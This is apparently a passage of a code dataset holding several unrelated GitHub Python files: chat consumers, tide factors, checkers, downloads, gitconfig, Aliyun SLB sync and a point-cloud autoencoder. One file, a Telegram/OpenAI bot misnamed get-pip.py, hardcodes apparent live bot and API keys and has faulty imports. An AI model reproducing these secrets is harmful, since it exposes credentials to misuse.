'type':'user_status',\n 'user_id':info.user.id,\n 'status': info.status\n }\n )\n except:\n pass\n \n async def receive(self, text_data):\n data = json.loads(text_data)\n status = data.get('status')\n user_id = data.get('user_id')\n print(user_id)\n self.user_id = user_id\n if status == \"WENT_ONLINE\":\n infors = await self.set_status(True,user_id)\n for info in infors:\n await self.channel_layer.group_send(\n f'user',\n {\n 'type': 'user_status',\n 'user_id': info.user.id,\n 'status': info.status\n }\n )\n elif status == \"WENT_OFFLINE\":\n infors = await self.set_status(False,user_id)\n for info in infors:\n await self.channel_layer.group_send(\n f'user',\n {\n 'type': 'user_status',\n 'user_id': info.user.id,\n 'status': info.status\n }\n )\n \n async def user_status(self,event):\n user_id = event['user_id']\n status = event['status']\n str = \"OFFLINE\"\n if status==True: str = \"ONLINE\"\n await self.send(text_data=json.dumps({\n 'type_set':'USERS',\n 'user_id':user_id,\n 'status':str\n }))\n\n @sync_to_async\n def set_status(self, status, user_id):\n user = User.objects.get(id=user_id)\n Information.objects.filter(user=user).update(status=status)\n infors = Information.objects.all()\n return infors\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n room_id = 0\n username = \"\"\n \n async def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_id']\n self.room_group_name = f'chat_{self.room_name}'\n self.user = self.scope['user']\n\n # Join room\n await self.channel_layer.group_add(\n self.room_group_name,\n self.channel_name\n )\n\n await self.accept()\n\n async def disconnect(self, close_code):\n # Leave room\n await self.channel_layer.group_discard(\n self.room_group_name,\n self.channel_name\n )\n\n # Receive message from web socket\n async def receive(self, text_data):\n data = json.loads(text_data)\n message = data.get('message')\n self.username = data.get('username')\n self.room_id = data.get('room_id')\n type_set = data.get('type_set')\n # print(self.room_id)\n \n if type_set==\"CHAT\":\n date = await self.save_message(self.username, self.room_id, message)\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'message': message,\n 'username': self.username,\n 'date': date\n }\n )\n \n # Receive message from room group\n async def chat_message(self, event):\n message = event['message']\n username = event['username']\n date = event['date']\n\n # Send message to WebSocket\n await self.send(text_data=json.dumps({\n 'type_set':'CHAT',\n 'message': message,\n 'username': username,\n 'date': date\n }))\n\n @sync_to_async\n def save_message(self, username, room_id, message):\n room = Room.objects.filter(id=room_id).first()\n user = User.objects.filter(username=username).first()\n message = Message.objects.create(user=user, room=room, content=message)\n return message.date_added.strftime(\"%d/%m/%Y %H:%M\")","repo_name":"NguyenKhoa-dev/DACS_ChatApp_P2","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17461488527","text":"#!/usr/bin/env python\n\n\"\"\"Table of Node factor f, for M2.\n\nUnless otherwise specified:\nT measured in Julian centuries with 0 at midnight at Greenwich\nmeridian for 0/1 January 1900.\n\nLongitudes measured in ecliptic plan from point of Ares. In\ndegrees.\n\nCompare with\nhttp://www.pac.dfo-mpo.gc.ca/science/oceans/tidal-marees/facteur-node-factor-eng.htm\n\n\"\"\"\n\nimport math\nimport sys\n\ndef Nat(T):\n \"\"\"Longitude of lunar ascending node at time T.\"\"\"\n # [PUGH1976] Table 4:2\n return 259.16 - 1934.14*T + 0.0021*T**2\n\ndef factorK1at(T):\n \"\"\"Node factor f for K1 at Time T.\"\"\"\n N = math.radians(Nat(T))\n # IHO Constituent List\n f = 1.0060 + 0.1150*math.cos(N) - 0.0088*math.cos(2*N) + 0.0006*math.cos(3*N)\n return f\n\ndef factorK2at(T):\n \"\"\"Node factor f for K2 at Time T.\"\"\"\n N = math.radians(Nat(T))\n # IHO Constituent List\n f = 1.0246 + 0.2863*math.cos(N) + 0.0083*math.cos(2*N) - 0.0015*math.cos(3*N)\n return f\n\ndef factorM2at(T):\n \"\"\"Node factor f for M2 at time T.\"\"\"\n N = math.radians(Nat(T))\n # IHO Constituent List\n f = 1.0007 - 0.0373*math.cos(N) + 0.0002*math.cos(2*N)\n return f\n\ndef factorO1at(T):\n \"\"\"Node factor f for O1 at time T.\"\"\"\n # Note: The IHO apparently publishes the wrong correction.\n # The one used here produces factors that agree with\n # [SCHUREMAN1971] and http://www.pac.dfo-mpo.gc.ca/science/oceans/tidal-marees/facteur-node-factor-eng.htm\n N = math.radians(Nat(T))\n # IHO Constituent List\n # f = 1.0176 + 0.1871*math.cos(N) - 0.0147*math.cos(2*N)\n # Using corrected 1.009 value from [PUGH1976] Table 4:3\n f = 1.009 + 0.1871*math.cos(N) - 0.0147*math.cos(2*N)\n return f\n\nfactor = dict(K1=factorK1at, K2=factorK2at, M2=factorM2at, O1=factorO1at)\n\ndef TofY(Y):\n \"\"\"Time T for July 1 in year Y (CE).\"\"\"\n # Days between Jan 1 and July 1\n D = 181\n leap = (Y%4 == 0) - (Y%100 == 0) + (Y%400 == 0)\n D += leap\n T = 365*(Y-1900) + D + (Y-1901)//4\n T /= 36525.0\n return T\n\n\n# There are several factors where IHO and \n# http://www.pac.dfo-mpo.gc.ca/science/oceans/tidal-marees/facteur-node-factor-eng.htm\n# differ:\n# N2: IHO say to use M2\n# P1: IHO say to use a constant 1\n# Q1: IHO say to use O1\n# S2: Not listed at IHO (drj: why would this have a nodal\n# correction?)\n\ndef main():\n constituents = \"O1 K1 M2 K2\".split()\n for year in range(1900,2051):\n T = TofY(year)\n sys.stdout.write(\"%d\" % year)\n for con in constituents:\n f = factor[con](T)\n sys.stdout.write(\" %s %6.3f\" % (con, f))\n sys.stdout.write(\"\\n\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"drj11/tidal","sub_path":"code/factorf.py","file_name":"factorf.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71933443753","text":"from game_behavior import GameBehavior\nfrom checker import Checkers\n\nSIZE = 8\n\n\nclass Ai(GameBehavior):\n def __init__(self, board, color):\n GameBehavior.__init__(self, board, color)\n self.valid_move = []\n self.valid_jump = None\n self.jump = []\n self.before_jump = None\n \n\n def initialize(self):\n \"\"\"initialize the board with checkers\"\"\"\n for x in range(SIZE):\n for y in range(SIZE):\n if y < 3 and (x % 2 == 0 and y % 2 != 0 or x % 2 != 0 and y % 2 == 0):\n self.add_checker(Checkers(x, y, 100, self.color))\n\n def has_valid_move(self, c):\n if c.color == self.color:\n if c.is_king:\n for i, j in [(1, 1), (1, -1), (-1, 1), (-1, -1)]:\n new_x, new_y = c.x + i, c.y + j\n if 0 <= new_x < SIZE and 0 <= new_y < SIZE:\n if self.find_checker(new_x, new_y) == -1:\n c.has_valid_move = True\n self.valid_move.append(new_x)\n self.valid_move.append(new_y)\n return True\n else:\n for i, j in [(1, 1), (-1, 1)]:\n new_x, new_y = c.x + i, c.y + j\n if 0 <= new_x < SIZE and 0 <= new_y < SIZE:\n if self.find_checker(new_x, new_y) == -1:\n c.has_valid_move = True\n self.valid_move.append(new_x)\n self.valid_move.append(new_y)\n return True\n c.has_valid_move = False\n return False\n\n def has_valid_jump(self, c):\n if c.color == self.color:\n if c.is_king:\n for i, j in [(2, 2), (-2, -2), (2, -2), (-2, 2)]:\n new_x, new_y = c.x + i, c.y + j\n if 0 <= new_x < SIZE and 0 <= new_y < SIZE and self.find_checker(new_x, new_y) == -1:\n jumped_x, jumped_y = (c.x + new_x) // 2, (c.y + new_y) // 2\n jumped = self.find_checker(jumped_x, jumped_y)\n if jumped != -1 and jumped.color != c.color:\n self.valid_jump = jumped\n c.has_valid_jump = True\n self.jump.append(new_x)\n self.jump.append(new_y)\n self.before_jump = c\n return True\n else:\n for i, j in [(2, 2), (-2, 2)]:\n new_x, new_y = c.x + i, c.y + j\n if 0 <= new_x < SIZE and 0 <= new_y < SIZE and self.find_checker(new_x, new_y) == -1:\n jumped_x, jumped_y = (c.x + new_x) // 2, (c.y + new_y) // 2\n jumped = self.find_checker(jumped_x, jumped_y)\n if jumped != -1 and jumped.color != c.color:\n self.valid_jump = jumped\n c.has_valid_jump = True\n self.jump.append(new_x)\n self.jump.append(new_y)\n self.before_jump = c\n return True\n c.has_valid_jump = False\n self.before_jump = None\n return False\n\n\n def move(self, checker, jump=False):\n if jump and self.jump_exist():\n checker.move(self.jump[0], self.jump[1])\n self.eat_checker(self.valid_jump)\n self.valid_jump = None\n self.jump = []\n self.before_jump = None\n else:\n checker.move(self.valid_move[0], self.valid_move[1])\n self.valid_move = []\n\n def jump_exist(self):\n for c in self.board:\n if c == self.before_jump:\n return True\n return False","repo_name":"CS12300/python_games","sub_path":"checker_game_starter/ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22279536765","text":"import urllib2\nimport threading\nimport utils\nfrom contextlib import closing\n\nBLOCK_SIZE = 1024\n\n\nclass DownloadProgressBar(object):\n def __init__(self, idx, total, multithreading=False, name=None):\n self.idx = idx\n self.total = total\n self.w = str(len(str(self.total)))\n self.multithreading = multithreading\n self.name = name\n\n def show(self, written_len, remote_len):\n pass\n\n\ndef download_file(path, url, progress_bar=None):\n remote_sz = utils.remote_file_size(url)\n sz = utils.local_file_size(path)\n\n req = urllib2.Request(url)\n req.headers['Range'] = 'bytes=%d-' % sz\n\n with open(path, \"ab\" if sz else \"wb\") as fd:\n with closing(urllib2.urlopen(req)) as remote_fd:\n remote_fd = urllib2.urlopen(req)\n written = sz\n\n while written < remote_sz:\n block = remote_fd.read(BLOCK_SIZE)\n fd.write(block)\n written += len(block)\n if progress_bar:\n progress_bar.show(written, remote_sz)\n\n\nclass DownloaderThread(threading.Thread):\n \"\"\" Threaded downloader \"\"\"\n def __init__(self, name, task, params_q, res_q=None):\n threading.Thread.__init__(self, name=name)\n self.task = task\n self.params_q = params_q\n self.res_q = res_q\n\n def run(self):\n while 1:\n params = self.params_q.get()\n if params is None:\n break\n res = self.task(*params)\n if self.res_q is not None:\n self.res_q.put(res)\n self.params_q.task_done()\n","repo_name":"inkerra/python-vk","sub_path":"vk/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"25620984822","text":"import logging\nfrom telegram import Update\nfrom telegram import Updater, CommandHandler, MessageHandler, CallbackContext, MessageFilter\nimport openai\n\n# Замените 'YOUR_TELEGRAM_BOT_TOKEN' на ваш собственный API ключ от BotFather\nTELEGRAM_BOT_TOKEN = '6167500256:AAF_nDdGlgQQb1nZq2QT1Ut84bL4INICAXk'\n\n# Замените 'YOUR_OPENAI_API_KEY' на ваш собственный ключ API от OpenAI\nOPENAI_API_KEY = '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'\n\n# Инициализация библиотеки OpenAI с использованием вашего ключа API\nopenai.api_key = OPENAI_API_KEY\n\n# Настройка логгирования\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n# Обработчик команды /start\ndef start(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Привет! Я бот, построенный на GPT-3 модели. Чем я могу помочь?')\n\n# Обработчик текстовых сообщений\ndef respond_to_message(update: Update, _: CallbackContext) -> None:\n user_input = update.message.text\n\n # Здесь мы используем GPT-3 для получения ответа на сообщение пользователя\n response = generate_gpt3_response(user_input)\n\n update.message.reply_text(response)\n\n# Функция для использования GPT-3 для генерации ответа\ndef generate_gpt3_response(user_input: str) -> str:\n # Здесь вы можете настроить параметры для GPT-3, если хотите\n response = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=user_input,\n max_tokens=150,\n temperature=0.7,\n n=1,\n stop=None,\n )\n\n return response.choices[0].text.strip()\n\ndef main() -> None:\n # Инициализация Updater с вашим API токеном бота\n updater = Updater(TELEGRAM_BOT_TOKEN)\n\n # Получение диспетчера для регистрации обработчиков команд и сообщений\n dispatcher = updater.dispatcher\n\n # Регистрация обработчиков\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(MessageHandler(MessageFilter.text & ~MessageFilter.command, respond_to_message))\n\n # Запуск бота\n updater.start_polling()\n\n # Запуск обработчика до принятия сигнала остановки\n updater.idle()\n\nif __name__ == '__main__':\n main()\n\nif __name__ == '__main__':\n main()\n","repo_name":"MrPixelcool/b","sub_path":"get-pip.py","file_name":"get-pip.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11629904779","text":"import cv2\n\n# rtsp://:@/axis-media/media.amp\nrtsp_url = \"rtsp://root:kamera@169.254.104.185/axis-media/media.amp\"\n\nclass ThermalStream:\n def __init__(self, camera_index=rtsp_url, width=640, height=480):\n self.camera_index = camera_index\n self.width = width\n self.height = height\n self.cam = cv2.VideoCapture(camera_index)\n self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, width)\n self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n\n def run(self):\n while True:\n ret, Tframe = self.cam.read()\n \n if ret:\n Cframe = cv2.resize(Tframe, (self.width, self.height))\n cv2.imshow(\"Normal\", Tframe)\n \n if cv2.waitKey(1) == ord('q'):\n break\n else:\n break\n \n self.cam.release()\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n thermal_stream = ThermalStream()\n thermal_stream.run()","repo_name":"magn3054/P6-Rock_detection","sub_path":"Thermal/MainThermal.py","file_name":"MainThermal.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72752266154","text":"from django.db import transaction\n\nfrom asset.ecs.models import EcsModel\nfrom asset.slb.models import SlbModel\nfrom asset.slb.models import SlbServerGroupModel\nfrom asset.slb.models import SlbServerGroupEcsModel\nfrom asset.manager.models import RegionModel\nfrom asset.manager.controllers import aliyun_key as aliyun_key_ctl\nfrom asset.manager.controllers import region as region_ctl\nfrom base import controllers as base_ctl\nfrom utils.time_utils import str2datetime_by_format\nfrom utils.aliyun import AliyunSLB\n\n\ndef format_slb_data(data):\n '''\n 格式化SLB返回数据\n '''\n name = data.get('LoadBalancerName')\n instance_id = data.get('LoadBalancerId')\n ip = data.get('Address')\n ip_typ = data.get('AddressType')\n zone_id = data.get('MasterZoneId')\n slave_zone_id = data.get('SlaveZoneId')\n region_id = data.get('RegionId')\n dt_buy = data.get('CreateTime')\n dt_buy = dt_buy.replace('T', ' ').replace('Z', '')\n dt_buy = str2datetime_by_format(dt_buy, '%Y-%m-%d %H:%M')\n result = {\n 'name': name,\n 'instance_id': instance_id,\n 'ip': ip,\n 'ip_typ': ip_typ,\n 'zone_id': zone_id,\n 'slave_zone_id': slave_zone_id,\n 'region_id': region_id,\n 'dt_buy': dt_buy,\n }\n return result\n\n\ndef sync_slbs():\n '''\n 同步SLB\n '''\n with transaction.atomic():\n key, secret = aliyun_key_ctl.get_enabled_aliyun_key()\n regions = region_ctl.get_regions(status=RegionModel.ST_ENABLE)['data_list']\n # 记录原来已经创建过的SLB,用于之后删除已经不存在的使用\n old_ids = SlbModel.objects.values_list('id', flat=True).all()\n old_ids = list(set(old_ids))\n # 用来存储仍然可以查到的SLB\n existed_ids = []\n # 记录需要新创建的SLB信息,用于批量创建\n slb_list = []\n # 每次使用都先使用默认的地域初始化,其实可以在类里增加默认值,但是没有增加默认值是为了更明确知道在干什么\n ali_cli = AliyunSLB(key, secret, 'cn-beijing')\n for region in regions:\n region_id = region.get('instance_id')\n ali_cli.reset_region(region_id)\n page_num = 1\n page_size = 50\n while True:\n query = {\n 'page_num': page_num,\n 'page_size': page_size,\n }\n data = ali_cli.get_slbs(**query)\n total = data.get('total')\n data_list = data.get('data_list')\n for data in data_list:\n data = format_slb_data(data)\n instance_id = data.get('instance_id')\n obj = SlbModel.objects.filter(instance_id=instance_id).first()\n if obj:\n base_ctl.update_obj(SlbModel, obj.id, data)\n existed_ids.append(obj.id)\n else:\n slb_list.append(data)\n if total <= page_num * page_size:\n break\n page_num += 1\n base_ctl.create_objs(SlbModel, slb_list)\n deleted_ids = list(set(set(old_ids) - set(existed_ids)))\n if deleted_ids:\n base_ctl.delete_objs(SlbModel, deleted_ids)\n sync_slb_backend_servers()\n\n\ndef sync_slb_backend_servers():\n '''\n 同步SLB默认服务器组服务器\n '''\n with transaction.atomic():\n slb_objs = SlbModel.objects.all()\n query = {\n 'server_group__typ': SlbServerGroupModel.TYP_DEFAULT,\n }\n old_ids = SlbServerGroupEcsModel.objects.filter(**query).values_list('id', flat=True).all()\n old_ids = list(set(old_ids))\n existed_ids = []\n ecs_list = []\n key, secret = aliyun_key_ctl.get_enabled_aliyun_key()\n ali_cli = AliyunSLB(key, secret, 'cn-beijing')\n for slb_obj in slb_objs:\n group_obj = SlbServerGroupModel.objects.filter(slb_id=slb_obj.id)\\\n .filter(typ=SlbServerGroupModel.TYP_DEFAULT).first()\n if not group_obj:\n data = {\n 'slb_id': slb_obj.id,\n 'name': 'default',\n 'instance_id': 'default',\n 'typ': SlbServerGroupModel.TYP_DEFAULT,\n }\n group_obj = base_ctl.create_obj(SlbServerGroupModel, data)\n ali_cli.reset_region(slb_obj.region_id)\n ecses = ali_cli.get_slb_info(slb_obj.instance_id).get('backend_servers')\n for ecs in ecses:\n ecs_instance_id = ecs.get('ServerId')\n ecs_obj = EcsModel.objects.filter(instance_id=ecs_instance_id).first()\n weight = ecs.get('Weight')\n obj = SlbServerGroupEcsModel.objects.filter(slb_id=slb_obj.id)\\\n .filter(server_group_id=group_obj.id, ecs_id=ecs_obj.id).first()\n data = {\n 'slb_id': slb_obj.id,\n 'server_group_id': group_obj.id,\n 'ecs_id': ecs_obj.id,\n 'weight': weight,\n }\n if not obj:\n ecs_list.append(data)\n else:\n base_ctl.update_obj(SlbServerGroupEcsModel, obj.id, data)\n existed_ids.append(obj.id)\n base_ctl.create_objs(SlbServerGroupEcsModel, ecs_list)\n deleted_ids = list(set(set(old_ids) - set(existed_ids)))\n if deleted_ids:\n base_ctl.delete_objs(SlbServerGroupEcsModel, deleted_ids)\n sync_slb_vserver_groups()\n\n\ndef sync_slb_vserver_groups():\n '''\n 同步SLB虚拟服务器组\n '''\n with transaction.atomic():\n slb_objs = SlbModel.objects.all()\n old_ids = SlbServerGroupModel.objects.filter(typ=SlbServerGroupModel.TYP_VSERVER)\\\n .values_list('id', flat=True).all()\n old_ids = list(set(old_ids))\n existed_ids = []\n group_list = []\n key, secret = aliyun_key_ctl.get_enabled_aliyun_key()\n ali_cli = AliyunSLB(key, secret, 'cn-beijing')\n for slb_obj in slb_objs:\n ali_cli.reset_region(slb_obj.region_id)\n groups = ali_cli.get_vserver_groups(slb_obj.instance_id).get('data_list')\n for group in groups:\n group_instance_id = group.get('VServerGroupId')\n group_name = group.get('VServerGroupName')\n query = {\n 'slb_id': slb_obj.id,\n 'typ': SlbServerGroupModel.TYP_VSERVER,\n 'instance_id': group_instance_id,\n }\n group_obj = SlbServerGroupModel.objects.filter(**query).first()\n data = {\n 'slb_id': slb_obj.id,\n 'instance_id': group_instance_id,\n 'name': group_name,\n 'typ': SlbServerGroupModel.TYP_VSERVER,\n }\n if not group_obj:\n group_list.append(data)\n else:\n group_obj = base_ctl.update_obj(SlbServerGroupModel, group_obj.id, data)\n existed_ids.append(group_obj.id)\n base_ctl.create_objs(SlbServerGroupModel, group_list)\n deleted_ids = list(set(set(old_ids) - set(existed_ids)))\n if deleted_ids:\n base_ctl.delete_objs(SlbServerGroupModel, deleted_ids)\n sync_slb_vserver_group_backend_servers()\n\n\ndef sync_slb_vserver_group_backend_servers():\n '''\n 同步虚拟服务器组后端服务器\n '''\n with transaction.atomic():\n query = {\n 'typ': SlbServerGroupModel.TYP_VSERVER,\n }\n group_objs = SlbServerGroupModel.objects.filter(**query).all()\n\n query = {\n 'server_group__typ': SlbServerGroupModel.TYP_VSERVER,\n }\n old_ids = SlbServerGroupEcsModel.objects.filter(**query).values_list('id', flat=True).all()\n old_ids = list(set(old_ids))\n existed_ids = []\n ecs_list = []\n key, secret = aliyun_key_ctl.get_enabled_aliyun_key()\n ali_cli = AliyunSLB(key, secret, 'cn-beijing')\n for group_obj in group_objs:\n ali_cli.reset_region(group_obj.slb.region_id)\n ecses = ali_cli.get_vserver_group_backend_servers(group_obj.instance_id).get('data_list')\n for ecs in ecses:\n ecs_instance_id = ecs.get('ServerId')\n weight = ecs.get('Weight')\n ecs_obj = EcsModel.objects.filter(instance_id=ecs_instance_id).first()\n query = {\n 'slb_id': group_obj.slb_id,\n 'server_group_id': group_obj.id,\n 'ecs_id': ecs_obj.id,\n }\n obj = SlbServerGroupEcsModel.objects.filter(**query).first()\n data = {\n 'slb_id': group_obj.slb_id,\n 'server_group_id': group_obj.id,\n 'ecs_id': ecs_obj.id,\n 'weight': weight,\n }\n if not obj:\n ecs_list.append(data)\n else:\n base_ctl.update_obj(SlbServerGroupEcsModel, obj.id, data)\n existed_ids.append(obj.id)\n base_ctl.create_objs(SlbServerGroupEcsModel, ecs_list)\n deleted_ids = list(set(set(old_ids) - set(existed_ids)))\n if deleted_ids:\n base_ctl.delete_objs(SlbServerGroupEcsModel, deleted_ids)\n","repo_name":"bxxfighting/rurality","sub_path":"asset/slb/controllers/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":9492,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"12767148011","text":"import os\nimport sys\nfrom re import search\n\nfrom gitconfig.config import (\n ConfigDict,\n ConfigFile,\n )\n\nif sys.version_info < (2, 7):\n from ordereddict import OrderedDict\n from collections import MutableMapping\nelse:\n from collections import (\n OrderedDict,\n MutableMapping,\n )\n\nclass GitRepoNotFoundError(Exception): pass\n\nclass GitConfig():\n\n def __init__(self,**kwargs):\n self.path = kwargs.get('path', None)\n self.file = kwargs.get('file', None)\n\n if self.path:\n if os.path.exists(self.path):\n\n config_path = self.detect_git_config(self.path)\n if os.path.exists(config_path):\n self.config_path = config_path\n self.config = ConfigFile.from_path(config_path)\n else:\n raise GitRepoNotFoundError(self.path)\n else:\n raise IOError(self.path)\n\n else:\n self.config = ConfigFile.from_file(self.file)\n\n def detect_git_config(self, path):\n config_path = \"\"\n if search(r'\\.git/config', path):\n config_path = path\n elif search(r'\\.git', path):\n config_path = \"{0}/config\".format(path)\n else:\n config_path = \"{0}/.git/config\".format(path)\n\n return config_path\n\n def has_remotes(self):\n return self.has_section('remote')\n\n def has_remote(self, remote_name):\n return self.has_section('remote', remote_name)\n\n def has_section(self, section_type, section_name = ''):\n config_sections = self.config.itersections()\n\n \"\"\"\n These variables are used in return statements only\n They are used to experiment with readability\n \"\"\"\n yes_there_is_section_with_this_name = yes_this_section_exists = True\n sorry_search_section_doest_not_exist = False\n\n\n for section in config_sections:\n this_section_type = section[0]\n search_for_section_with_spcific_name = (section_name != '')\n\n if not search_for_section_with_spcific_name:\n\n if this_section_type == section_type:\n return yes_this_section_exists # True\n else:\n try:\n this_section_name = section[1]\n if this_section_name == section_name:\n return yes_there_is_section_with_this_name # True\n except IndexError:\n \"\"\" These type of sections are like [core], [alias], [user]\"\"\"\n continue\n\n return sorry_search_section_doest_not_exist # False\n\n @property\n def remotes(self):\n config_sections = self.config.items()\n remotes = OrderedDict()\n\n for section in config_sections:\n section_type = section[0][0]\n if section_type == 'remote':\n\n remote_name = section[0][1]\n remote_properties = section[1]\n\n remotes[remote_name] = remote_properties\n\n return remotes\n\n @property\n def sections(self):\n config_sections = self.config.items()\n return [section[0][0] for section in config_sections]\n\n def set(self, section, key, value):\n return self.config.set((section,), key, value)\n\n def get(self, section, key):\n section_details = section.split('.')\n\n if len(section_details) == 2:\n section_type, section_name = section_details\n else:\n section_type, section_name = (section, '')\n\n return self.config.get((section_type, section_name), key)\n\n def save(self):\n return self.config.write_to_path(self.config_path)\n\n","repo_name":"mignev/startappsync","sub_path":"gitconfig/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18939600580","text":"#LISTAS\n\ndimension = [1,2,5,6,87,7]\ndosDimensiones= [[12,56],[14,125,13],[\"Hola\",\"Mundo\"],[True,False]]\ntablas = [[10,1,[0,53]], [20,2], [30,3]]\n\n\n##print(tablas[0][2][1])\n##print(tablas[1][1])\n\n##print(dosDimensiones[2][0] + \" \" + dosDimensiones[2][1])\n\"\"\"\nfor item in dosDimensiones:\n print(item)\n for valor in item:\n print(valor)\n \n \nfor cont in range(0,10,1):\n print(cont)\n \"\"\" \n\n## add append, remove, filter, map, reduce\n\n#Diccionarios\nmaterias = {\n \"nombre\": \"Matematicas\",\n \"codigo\": \"T1248\",\n \"UV\": 4,\n \"estado\":False\n}\n\nprint(materias[\"nombre\"])\nprint(materias[\"codigo\"])","repo_name":"UntalivanCruz/319estructuraI","sub_path":"semana2/arrays/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27187519960","text":"\"\"\"Code for training CycleGAN.\"\"\"\r\nfrom datetime import datetime\r\nimport json\r\nimport numpy as np\r\nimport os\r\n# import random\r\nimport imageio\r\nfrom open3d import *\r\n\r\nimport click\r\nimport tensorflow as tf\r\n# from skimage import io,transform\r\nimport sklearn.preprocessing\r\n\r\nimport losses\r\nimport model_ae_pc_adaptive as model\r\nfrom shapenet_dataset_ae import *\r\nfrom visu_utils import point_cloud_one_view\r\nimport provider\r\n\r\nslim = tf.contrib.slim\r\n\r\nDECAY_STEP = 100000\r\nDECAY_RATE = 0.7\r\n\r\nBN_INIT_DECAY = 0.5\r\nBN_DECAY_CLIP = 0.99\r\nBN_DECAY_DECAY_STEP = float(DECAY_STEP)\r\nBN_DECAY_DECAY_RATE = 0.5\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\r\n\r\ndef camera_info(param):\r\n theta = np.deg2rad(param[0])\r\n phi = np.deg2rad(param[1])\r\n\r\n camY = param[3]*np.sin(phi)\r\n temp = param[3]*np.cos(phi)\r\n camX = temp * np.cos(theta) \r\n camZ = temp * np.sin(theta) \r\n cam_pos = np.array([camX, camY, camZ]) \r\n\r\n axisZ = cam_pos.copy()\r\n axisY = np.array([0,1,0])\r\n axisX = np.cross(axisY, axisZ)\r\n axisY = np.cross(axisZ, axisX)\r\n\r\n cam_mat = np.array([axisX, axisY, axisZ])\r\n cam_mat = sklearn.preprocessing.normalize(cam_mat, axis=1)\r\n return cam_mat, cam_pos\r\n\r\ndef rotate_point_cloud(xyz): # rotate point clouds z-upwards\r\n R_x = np.array([[1, 0, 0],\r\n [0, 0, -1],\r\n [0, 1, 0]])\r\n R_y = np.array([[0, 0, 1],\r\n [0, 1, 0],\r\n [-1, 0, 0]])\r\n xyz_rotated = np.dot(xyz, R_x)\r\n xyz_rotated = np.dot(xyz_rotated, R_y)\r\n\r\n cam_mat, _ = camera_info([45., 25.0, 0, 1.25])\r\n final_pc = np.dot(xyz_rotated, cam_mat.transpose())\r\n return final_pc\r\n\r\nclass AE_PC:\r\n\r\n def __init__(self, output_root_dir, to_restore, to_train,\r\n base_lr, max_step, checkpoint_dir, data_list_train, data_list_test):\r\n current_time = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\r\n\r\n if to_train == 0:\r\n self._output_dir = os.path.join(output_root_dir, \"test_ae_pc\")\r\n else:\r\n self._output_dir = os.path.join(output_root_dir, current_time)\r\n self._images_dir = os.path.join(self._output_dir, 'imgs')\r\n self._point_clouds_dir = os.path.join(self._output_dir, 'pcs')\r\n self._num_imgs_to_save = 20\r\n self._to_restore = to_restore\r\n self._base_lr = base_lr\r\n self._max_step = max_step\r\n self._checkpoint_dir = checkpoint_dir\r\n self._data_list_train = data_list_train\r\n self._data_list_test = data_list_test\r\n\r\n def load(self, checkpoint_dir_ae_pc, sess=None):\r\n if not sess:\r\n raise AttributeError(\"TensorFlow session not provided.\")\r\n self.model_setup()\r\n sess.run(tf.global_variables_initializer())\r\n saver = tf.train.Saver([v for v in tf.all_variables() if 'AE_PC' in v.name])\r\n chkpt_fname = tf.train.latest_checkpoint(checkpoint_dir_ae_pc)\r\n saver.restore(sess, chkpt_fname)\r\n\r\n def get_learning_rate(self, batch):\r\n learning_rate = tf.train.exponential_decay(\r\n self._base_lr, \r\n batch * model.BATCH_SIZE, \r\n DECAY_STEP, \r\n DECAY_RATE, \r\n staircase=True)\r\n learning_rate = tf.maximum(learning_rate, 0.00001) \r\n return learning_rate\r\n\r\n def model_setup(self):\r\n \"\"\"\r\n This function sets up the model to train.\r\n\r\n \"\"\"\r\n self.input_pc = tf.placeholder(\r\n tf.float32, [\r\n None,\r\n model.PC_POINTS,\r\n model.PC_CHANNELS\r\n ], name=\"input_pc_pl\")\r\n\r\n self.input_normals_pc = tf.placeholder(\r\n tf.float32, [\r\n None,\r\n model.PC_POINTS,\r\n model.PC_CHANNELS\r\n ], name=\"input_normals_pl\")\r\n \r\n self.input_features_pc = tf.placeholder(\r\n tf.float32, [\r\n None,\r\n model.PC_FEATURES\r\n ], name=\"features_pc_pl\"\r\n )\r\n\r\n self.surface_area_pc = tf.placeholder(\r\n tf.float32, [\r\n None\r\n ], name=\"surface_area\"\r\n )\r\n\r\n self.global_step = slim.get_or_create_global_step()\r\n\r\n self.num_fake_inputs = 0\r\n\r\n self.is_training = tf.placeholder(tf.bool, shape=[], name=\"is_training\")\r\n self.batch = tf.get_variable('batch', [], initializer=tf.constant_initializer(0), trainable=False)\r\n self.learning_rate = self.get_learning_rate(self.batch)\r\n\r\n inputs = {\r\n 